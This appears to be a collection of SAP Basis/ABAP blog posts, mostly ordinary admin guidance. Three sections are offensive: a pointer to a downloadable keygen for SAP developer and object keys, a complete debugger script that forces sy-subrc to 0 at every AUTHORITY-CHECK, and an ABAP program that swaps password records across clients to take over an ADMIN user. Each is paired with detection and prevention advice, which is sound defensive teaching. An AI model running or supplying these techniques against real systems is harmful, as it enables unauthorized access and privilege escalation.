Generating substitution and validation rules

In the FICO module the consultant can define substitution and validation rules. These rules must be generated before they are active.

Questions that will be answered in this blog are:

  • How can I generate substitution and validation rules?
  • Where can I find more background on substitution and validation rules?

Substitution and validation rules generation

Go to SE38 and start program RGUGBR00:


Substitutions and validations

Simple select the correct application are indicated by the FICO consultant (this area can be FI, CO, etc). Select Generate validations and Generate Substitutions. Now execute.

Transport and system copies

You will need to run program RGUGBR00 locally on the system after the transport import is done.

Also after a system copy program RGUGBR00 must be run again.

See OSS note 1793212 – Transport validation or/and substitution.

Background on substitutions and validations

The full functional background on substitution and validation can be found this SAP wiki.

SAP support backbone update

The SAP support backbone update is live per 1.1.2020. Blocking started as of 8.1.2020. If you did not prepare your systems for it, you might loose support functions.

Per 31.07.2020 the sending of EWA’s via RFC towards SAP will no longer work. See OSS note 2923799 – Final Shutdown of RFC Connections From Customer Systems to SAP. At the same date OSS notes downloads via RFC will be fully blocked. Also the RTCCTOOL will stop to work (see oss note 2934203 – ST-A/PI 01T* SP01 – 01U SP00: SAP backbone connectivity for RTCCTOOL on basis 700-731 after RFC shutdown).

You can get or will already get messages like:

Access denied

SAP note 2847665 – OSS RFC Connection fails will refer you to the SAP Backbone connection update site.

Also on the main SAP support site there is this warning message:

Which refers to first-aid kit OSS note: 2874259 – First Aid Kit for Problems Related to SAP’s Support Backbone Switch-Over Starting on 8 January 2020 .

Questions that will be answered in this blog are:

  • Where can I find more background information on the SAP support backbone update?
  • Why can I find first aid support?
  • Do I need to upgrade SAP solution manager?
  • How to switch to digitally signed OSS notes?
  • Do I need to change my OSS RFC’s?
  • What else do I need to do?
  • How to check the correct setup in the SAP EWA report?
  • Where can I find a checklist to see if I am completely done?

Background information on SAP support backbone update

The landing page for SAP support backbone update can be found by following this link.

The webinar recording explaining all the highlights can be found by following this link.

The official OSS note is 2737826 – SAP Support Backbone Update / upcoming changes in SAP Service and Support Backbone interfaces (latest) in January 2020.

2 important OSS notes for quick start of actions:

And the new first aid kit OSS note:

2874259 – First Aid Kit for Problems Related to SAP’s Support Backbone Switch-Over Starting on 8 January 2020

Quick overview of all your systems in SAP service marketplace

SAP now provides the overview of your systems which are not ok in a special online overview. Follow this link. Your result can look like this:

What will change per 1.1.2020?

Basically the connection from SAP solution manager and the on premise SAP systems connection to the SAP backbone will change. This will impact many areas like OSS notes, EWA’s, landscape planning etc.

What do you need to do if you don’t want to loose any functionality?

Solution manager

If you don’t want to loose any functionality in SAP solution manager you will need to upgrade to Solution manager 7.2 to support package 7 or 8. If you are on 8 you have to do less manual work than on 7. On solution manager support packs 5 and 6 some functions will work, but with manual work and limitations. On solution manager 7.1 and solution manager 7.2 up to support pack 3, the connection to SAP support backbone will be lost on 1.1.2020. You can already upgrade to SP8 now and prepare solution manager.

For the automatic configuration of the connectivity follow the instructions in OSS note 2738426 – Automated Configuration of new Support Backbone Communication.

OSS notes

For OSS notes there are 2 changes: the RFC to SAP and digitally signed OSS notes.

For the RFC connection read and follow the instructions from OSS note 2740667 – RFC connection SAPOSS to SAP Service & Support backbone will change (latest) in January 2020.

OSS notes via SNOTE must be switched to digitally signed OSS notes. How to do this: see blog.

Next to this, you will need to change the OSS note RFC destination. The generic user will no longer work. You will need to change it to named technical user, or change to the connection from RFC to https connectivity.

If you setup digitally signed OSS notes there is an option for fallback to insecure.

Attention: this fallback will no longer work after 1.1.2020.

ANST

ANST is a great function to help you find OSS notes relevant for your issue. For more explanation on ANST look at this blog. The ANST reaches out to the SAP support backbone to check for recent notes. To keep the function working you need to setup a new webservice in SOAMANAGER (if the SOAP runtime is not active follow instructions in this blog). To setup the specific webservice follow the instructions in oss note 2730525 – Consuming the Note Search Webservice. Then apply OSS note 2732094 – ANST- Implementing SOAP Based ANST Note Search and 2818143 – SEARCH_NOTES- Implementing SOAP Based Note Search.

While switching to new SAP support backbone you might get a connection error. Follow the instructions from OSS note 2781045 – ANST / ST22 note search “Connection cannot be established” to solve it.

Other calls

See OSS note 2722027 – Certain OSS RFC APIs calls replaced with corresponding web service calls.

Online checklists

SAP has now published online checklists, based on your solution manager version. You can find the checklists on this link.

Support backbone configuration check in EWA report

If you install ST-A/PI 01T sp02 or higher in your system (see OSS note 2827332 – Service Data not Complete due to ST-A/PI not Up-to-date), the EWA report of that system will give information about the correct connection to SAP support backbone and correct use of technical user for the communication.

Example:

In the process OSS note 2802999 - SDCCN activation fails without errors or red icons in Migrate tab might need to be applied as well to solve an SDCCN error.

All background information can be found in OSS note 2823658 – EWA Checks for SAP Backbone Connectivity.

SDCCN error notes

SAP is having some issues with the SDCCN coding for the backbone connectivity. If you experience issues there, check out the following OSS notes:

Requirements and formulas

This blog will explain on post processing for requirements and formulas.

Questions that will be answered are:

  • How do requirements and formulas work?
  • How does generation via program RV80HGEN work?
  • How to automate RV80HGEN in transport?

VOFM: formulas

Formulas are maintained in transaction VOFM.

The start screen is just a menu:

VOFM start screen

The background of VOFM for all its options is explained in OSS note 327220 – VOFM function and its objects.

In this example we will code a new requirement for pricing (one of the most used topics for VOFM). Select the menu entry Requirements and then pricing:

Custom requirement for pricing

If you build you own routines the have to use the 900 series. Unfortunately the call off requires an SCCR object key. Save your 900 series entry.

Now double click on the routine to go into the editor:

Custom code for custom requirements

Now you can insert the custom code for your routine. Since system regards it as modification you will have to use the modification editor.

Program generation

After you finish the routine, you have generate it. Run program RV80HGEN to regenerate the routines. If you don’t do the generation run, your routine (or updated routine) will not be called.

Generation after transport

After you transport the routine to a quality or productive system the newly generated routine is not generated. So you need to run RV80HGEN in the target system. You can automate this by putting in an XPRA action for program RV80HGEN in the transport. Then as final step after import the RV80HGEN run will be triggered automatically.

To do this: go to your transport request or task. Switch to Change mode. Insert row. Enter program ID R3TR, object type XPRA, object name RV80HGEN, hit enter. Now save the transport again.

OSS note 598475 – XPRA RV80HGEN when transporting VOFM objects contains a modification to automate this for newly created routines. But this does not work for changes of routines.

Relevant OSS notes

In case of issues, check these OSS notes:



ABAP developer keys and object keys hack

A lot of basis and ABAP people feel protected by the ABAP keys and object keys for standard SAP changes. They have to be called off at SAP marketplace keys section.

Let me already give away the clue: since quite some time there is a KeyGen for ABAP and object keys. The protection is gone.

This blog will answer following questions:

  • Where can I download the ABAP keygen?
  • How to run the ABAP keygen?
  • How should I protect my system from unwanted ABAP changes?
  • S4HANA does not use developer keys and object keys any more, how should I protect my S4HANA system from unwanted ABAP changes?

Where can I download the ABAP keygen?

Google for SAP IWR Object key generator. Or click here for a copy:

Upon download: rename the file to .zip and unzip it.

New version W10 compliant, but not scanned (download and use at own risk!)

Credits for this version: Hugos.

Running ABAP keygen

Running the executable is simple. But you need to run it in Windows 7 compatibility mode.

Keygen screen

Fill out the data and hit generate…. that’s all.

The use of this tool is at your own risk. Most admins don't like you to use this tool at all.

The whole idea of this blog is to show not to rely on the developer key procedure.

How should I protect developments?

The best way to protect your development is to carefully grant the S_DEVELOP privilege. Only give it to the right people and only give it to develop Z* range of code.

Deletion of old developer keys is still relevant. Read the dedicated blog on deletion of developer keys.

S4HANA developer key

The title is a bit misleading. In S4HANA there are no developer keys and object keys any more.

Background of this change be SAP can be found in OSS note: 2309060 – The SSCR license key procedure is not supported in SAP S/4 HANA.

So in S4HANA, you must set up authorizations for S_DEVELOP properly.

With S_DEVELOP you have to set create/change rights for the packages and or objects. For custom code only hand out Z* privileges.

If you hand out a * for the objects or classes, then the developer can also change standard SAP.

For more background and further information, read this dedicated blog on ABAP protection in S/4HANA.


Custom ABAP set original system system

After a copy of a system to a new system (like a sandbox) you will find out the custom objects have a different original system and all changes will result into modification editor in stead of the normal ABAP editor.

Questions that will be answered in this blog are:

  • How to change original system of an object?
  • How to mass change original system of all Z objects in one shot?

Changing original system of an object

To change on original system of an object first start transaction SE03 to go to the transport organizer tools:

SE03 start screen

Select the tool Change Object Directory Entries:

Change object directories selection screen

Here you can select a specific program, function group, etc. In our case, we do a selection on the original system. This will give list of all objects with that original system:

Change object directories objects list

If you select an object and press the Change Object Directory button, you can change the original system of a single object.

Mass change

To execute a mass change you need select the top node first and then give in a command (not a menu option): key in mass in the command part:

Entry mass

Then hit enter and a new hidden popup will come:

Change to new original system

Now enter the new original system and press Ok. All is change in one shot now.

See also OSS note 2690211 – Mass change of Original System.

Emergency program

If for some reason it does not work you can use the below emergency program:

DATAzlt_tadir TYPE TABLE OF tadir.

DATAzls_tadir TYPE tadir.

SELECT FROM tadir INTO TABLE zlt_tadir WHERE srcsystem EQ 'SRC'.
LOOP AT zlt_tadir INTO zls_tadir.
zls_tadir-srcsystem 'TAR'.
MODIFY  tadir FROM zls_tadir.
WRITE sy-subrc.
ENDLOOP.

Debug scripting to bypass AUTHORITY-CHECK statements

How annoying these authorizations are… isn’t there a way to mass bypass them?

This blog will explain how you can do this with the use of debug scripting.

Recipe for bypassing authority-check via debug script

As input we need to have development rights with debug and replace (without replace it will not work).

Now we start a program like RSUSR003 in SE38 and find out we are not authorized:

RSUSR003

Now we start the debugger with /h and goto the scripting tab:

Script page

In the coding block of the script load this block of coding:

 *<SCRIPT:PERSISTENT>


*<SCRIPT:HEADER>
*<SCRIPTNAME>ZBYPASS</SCRIPTNAME>
*<SCRIPT_CLASS>LCL_DEBUGGER_SCRIPT</SCRIPT_CLASS>
*<SCRIPT_COMMENT>Debugger Skript: Default Template</SCRIPT_COMMENT>
*<BP_REACHED>X</BP_REACHED>

*</SCRIPT:HEADER>

*<SCRIPT:PRESETTINGS>
*<BP>
*<FLAGACTIVE>X</FLAGACTIVE>
*<KIND>1 </KIND>
*<STATEMENTSTA>AUTHORITY-CHECK</STATEMENTSTA>
*</BP>

*</SCRIPT:PRESETTINGS>

*<SCRIPT:SCRIPT_CLASS>
*---------------------------------------------------------------------*
*       CLASS lcl_debugger_script DEFINITION
*---------------------------------------------------------------------*
*
*---------------------------------------------------------------------*
CLASS lcl_debugger_script DEFINITION INHERITING FROM  cl_tpda_script_class_super  .

  PUBLIC SECTION.
    METHODS: prologue  REDEFINITION,
      init    REDEFINITION,
      script  REDEFINITION,
      end     REDEFINITION.

ENDCLASS.                    "lcl_debugger_script DEFINITION
*---------------------------------------------------------------------*
*       CLASS lcl_debugger_script IMPLEMENTATION
*---------------------------------------------------------------------*
*
*---------------------------------------------------------------------*
CLASS lcl_debugger_script IMPLEMENTATION.
  METHOD prologue.
*** generate abap_source (source handler for ABAP)
    super->prologue( ).
  ENDMETHOD.                    "prolog

  METHOD init.
*** insert your initialization code here
  ENDMETHOD.                    "init
  METHOD script.

****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
*Importing
*        REFERENCE( P_NEW_VALUE ) TYPE STRING
*        REFERENCE( P_OFFSET ) TYPE I
*        REFERENCE( P_LENGTH ) TYPE I
*        REFERENCE( P_VARNAME ) TYPE STRING
****************************************************************

*************************************************
* debugger commands (p_command):
* Step into(F5)   -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_INTO
* Execute(F6)     -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OVER
* Return(F7)      -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OUT
* Continue(F8)    -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_CONTINUE
*************************************************
****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DEBUGGER_CTRL / METHOD = DEBUG_STEP )
*Importing
*        REFERENCE( P_COMMAND ) TYPE I
****************************************************************

****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_ABAPDESCR / METHOD = LINE )
*Returning
*        VALUE( P_LINE ) TYPE I
****************************************************************

    TRY.
        CALL METHOD abap_source->line
          RECEIVING
            p_line = DATA(p_line).
      CATCH cx_tpda_src_info .
      CATCH cx_tpda_src_descr_invalidated .
    ENDTRY.

    TRY.
        CALL METHOD debugger_controller->debug_step
          EXPORTING
            p_command = cl_tpda_script_debugger_ctrl=>debug_step_over.
      CATCH cx_tpda_scr_rtctrl_status .
      CATCH cx_tpda_scr_rtctrl .
    ENDTRY.


****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
*Importing
*        REFERENCE( P_NEW_VALUE ) TYPE STRING
*        REFERENCE( P_OFFSET ) TYPE I
*        REFERENCE( P_LENGTH ) TYPE I
*        REFERENCE( P_VARNAME ) TYPE STRING
****************************************************************

    TRY.
        CALL METHOD cl_tpda_script_data_descr=>change_value
          EXPORTING
            p_new_value = '0'
*           p_offset    = -1
*           p_length    = -1
            p_varname   = 'sy-subrc'.
      CATCH cx_tpda_varname .
      CATCH cx_tpda_scr_auth .
    ENDTRY.

  ENDMETHOD.                    "script
  METHOD end.
*** insert your code which shall be executed at the end of the scripting (before trace is saved)
*** here

  ENDMETHOD.                    "end
ENDCLASS.                    "lcl_debugger_script IMPLEMENTATION
*</SCRIPT:SCRIPT_CLASS>

*</SCRIPT:PERSISTENT>

Check the code by hitting the check button.

If the code is ok, set the break-point at ABAP command AUTHORITY-CHECK:

Breakpoint

Now click on the Start Script button.

End result: you can execute the program without any issues.

Explanation of the method

What has happened here? The debug scripting is nothing more then fast automation. The developer could have manually bypassed all the multiple authorization checks in this program. Now he lets the script take care: the coding of the script simple changes the SY-SUBRC value after any break-point (which is reached at statement AUTHORITY-CHECK) to 0, which is green light: pass.

Prevention

If you don’t want this to happen in your system there are 2 main measures to take:

  1. Remove debug & replace authorization from all non-ABAP developers in a development system and remove debug & replace from all non-development systems for all users
  2. Make sure you tell the ABAP developers that you are aware of this script. You cannot prevent them from running it, but you can tell them that if you find out it can have severe consequences.

See also OSS note 3226223 – How to monitor debug activities in SAP Netweaver.

ANST for webapplications and FIORI

In the blog on ANST we focused on searching notes for ABAP GUI applications. This blog will focus on web application that run ABAP code in the backend (such as FIORI, BSP, webdynpro for ABAP).

Questions that will be answered in this blog are:

  • How do I use ANST for web applications?
  • What do I need to do to prepare my system for this?
  • What do I need to do for using ANST for FIORI back end recording?

System preparation for ANST for web applications

First you need to follow the instructions in OSS note 2286869 – ANST: Trace On/Off error “Dynamic Start and Stop cancelled by user” to get rid of the trace error. Unfortunately this note is not really clear. The short instruction on what to do follows now. Go to transaction FILE and search for the ANST_TRACES_GLOBAL. It should look like this:

ANST delete assignment of paths

Then select the logical file definition and delete the line for Physical path. Should look like this:

Now we are good to go for the web part recording, but not yet for FIORI.

ANST for FIORI

To use ANST for FIORI you first need to install OSS note
2605555 – ANST: Enahcement to support Fiori applications
. Please follow also the manual steps in the note very carefully.

Tip: this note contains a very good PDF attachment as manual for ANST.

Run ANST for web application

Running ANST for web applications is not very much different from running on SAP GUI. Upon start of the ANST tool select your web application (which is bit different per application):

ANST FIORI

After you now start with Execute you get a popup screen to confirm recording start:

ASNT FIORI start

After pressing start your web browser will start and you can perform the actions you want to trace. To stop go back to the ABAP screen and press the Stop Recording button:

ANST FIORI stop

The rest of the ANST processing is the same as usual.

Reference OSS notes

Reference and bug fix notes:


SAP database growth control: data archiving business discussions

This blog addresses the main challenge in SAP data archiving for functional object: the discussions with the business.

This blog will give answers to the following questions:

  • When to start data archiving discussion with the business?
  • How to come to good retention periods?
  • What are arguments for not archiving certain data?

Data archiving discussion with the business

Unlike technical data deletion, functional data archiving cannot be done without proper business discussion and approval.

Depending on your business several aspects for data are important:

  • Auditing and Sox needs
  • Tax and legal retention periods
  • Product data requirement
  • And so on…..

Here are some rules of thumb you can use before considering to start up the business discussions about archiving:

Rule of thumb 1: the system is pretty new. At least wait 3 years to get an insight into which tables are growing fast and are worth to investigate for data archiving.
Rule of thumb 2: if your system is growing slowly, but the infrastructure capabilities grow faster: only perform technical clean up and don't even start functional data archiving.
Rule of thumb 3: if you are on HANA: use NSE (Native Storage Extension) or check if the data aging concept for functional objects is stable enough and without bugs. NSE and data aging does not require too much work, it is only technical and it does not require much business discussions. Data retrieval from end user perspective is transparent.

Data analysis before starting the discussion

If your system is growing fast and/or you are getting performance complaints, then you need to do proper data analysis before starting any business discussion.

Start with proper analysis on the data. Use the TAANA tool to get insights into the data: how is the distribution of data per document type, per year, per plant/company code etc. If you want to propose retention period of let’s say 5 years, you can use the TAANA results to show what percentage of data you can move out of the database.

Secondly: if you have an idea on which data you want to archive, first execute a trial run on a recent production copy. There might be functional blocks that prevent you from archiving data (like not closed documents).

Third important factor is the ease of data retrieval. Some object have a nice simple data retrieval function, and some are really terrible. If the retrieval is good, the business will more easily accept a shorter retention period. Read more on technical data retrieval in this blog.

As last step you can start the business case: how much data will be saved (and how much money hence will be save) and how much performance would be gain. And how much time is needed to be invested for setting up, checking (testing!) and running the data archiving runs.

In practice data archiving business case is only present in very large systems of 5 TB and larger. This sizing tipping point changes in time as hardware gets cheaper and hourly manpower costs go up.

The discussion itself

Take must time in planning for the discussion itself. It is not uncommon that archiving discussions take over a year to complete. The better you are prepared the easier the discussion. It also helps to have a few real performance pain points to get solved via data archiving. There is normally a business owner for this pain point who can help push data archiving.

ABAP where used index

A nice feature in ABAP is the where used function on usage of programs, tables fields etc, in both standard can custom code. For this function to work properly the ABAP where used index must be up-to-date.

This blog will give answers to the following questions:

  • How to re-run the ABAP where used index?
  • How to speed up the ABAP where used index by running in parallel mode?
  • Which bug fix notes should I apply to get a good ABAP where used index?

How to run ABAP where used index?

You can run the programs SAPRSEUB and SAPRSEUC yourself in background, or start program SAPRSEUJ to schedule the jobs for you.

Program SAPRSEUB will index standard SAP objects. Program SAPRSEUC will index custom objects.

More background can be found in OSS note 18023 – Jobs EU_INIT, EU_REORG, EU_PUT. And OSS note 28022 – Customer system: Where-used list for SAP Objects.

S/4 HANA readiness check

For the S/4HANA readiness check (see note 2290622 – SAP Readiness Check for SAP S/4HANA) it is mandatory to run job SAPRSEUC. For more background information on the S/4 HANA readiness check see this blog.

Stopping the job

If for whatever reason you want to stop the jobs, use program SAPRSEUB_STOP.

Performance of the where used jobs using parallel processing

Check if OSS note 2228460 – Runtime of job EU_INIT, SAPRSEUB, performance is applied. Using settings in table RSEUPACTRL you can control the runtime behavior of the parallel execution of the where used indexing process. You can check in SM50 and SM66 if the job is using the parallel

OSS notes with bug fixes

The following bug fix OSS notes can be check if they are valid for your release:

Cross client access hacking

Most people underestimate how easy it is to gain access from one client to another client. This blog will explain how easy it is to do it.

Questions that will be answered in this blog are:

  • How to execute a cross client access hack?
  • How to detect this attack?
  • What preventive measures should I take to prevent this in my systems?

Cross client hack explained

You have gained access to a maintenance client by any method (most easy is standard users: see blog on this topic). Some basis and security people will waive this away and say: “by having access to client 066 the hacker cannot do anything, since the real business data is stored into a different client”.

So what the hacker will do is simple open the system client for ABAP coding (SCC4 client opening works from any client). Then he loads this simple program:

REPORT ZSWAPUSER. 

data: zls_usr02_1 type usr02. 
data: zls_usr02_2 type usr02. 
data: zls_usr02_t type usr02. 

parameters p_uname1 type usr02-bname. 
parameters p_mandt1 type sy-mandt. 
parameters p_mandt2 type sy-mandt.

select single * from usr02 client specified into zls_usr02_1 where bname eq p_uname1 and mandt = p_mandt1. 

select single * from usr02 client specified into zls_usr02_2 where bname eq p_uname1 and mandt = p_mandt2. 

zls_usr02_t = zls_usr02_1. zls_usr02_t-mandt = p_mandt2. modify usr02 client specified from zls_usr02_t. 
write sy-subrc. 

zls_usr02_t = zls_usr02_2. zls_usr02_t-mandt = p_mandt1. 
modify usr02 client specified from zls_usr02_t. 
write sy-subrc.

In the source client hacked a new user will be created. Let’s say the user ADMIN, which is also existing in the target client. The hacker creates the user ans sets the password in the source client he has access to. Now he runs the program. The program simply reads the password cross client (yes, ABAP can do cross client reading and updating), and then swaps them…..

After the swap the hacker will logon to the target client with the password he has set and enjoys all the roles from the user ADMIN. After he is done, he simply runs the program again. Then the old password is put back again.

Detecting this attack

Detecting this attack directly is very difficult. There are traces:

  • Client opening and closing in the source client
  • The presence of the ABAP code
  • The ABAP action in the source client’s audit log (you did switch on the audit log in all clients, didn’t you? And if you didn’t read this blog how to do it and execute it!)
  • ADMIN access from same terminal as the hacker is using to logon to the source client

Preventive measures

The following preventive measures can be taken:

  • Reset all standard passwords in all systems in all clients (see blog)
  • Delete no longer needed clients 001 and 066 (see blog)
  • Switch on audit logging in all clients (see blog)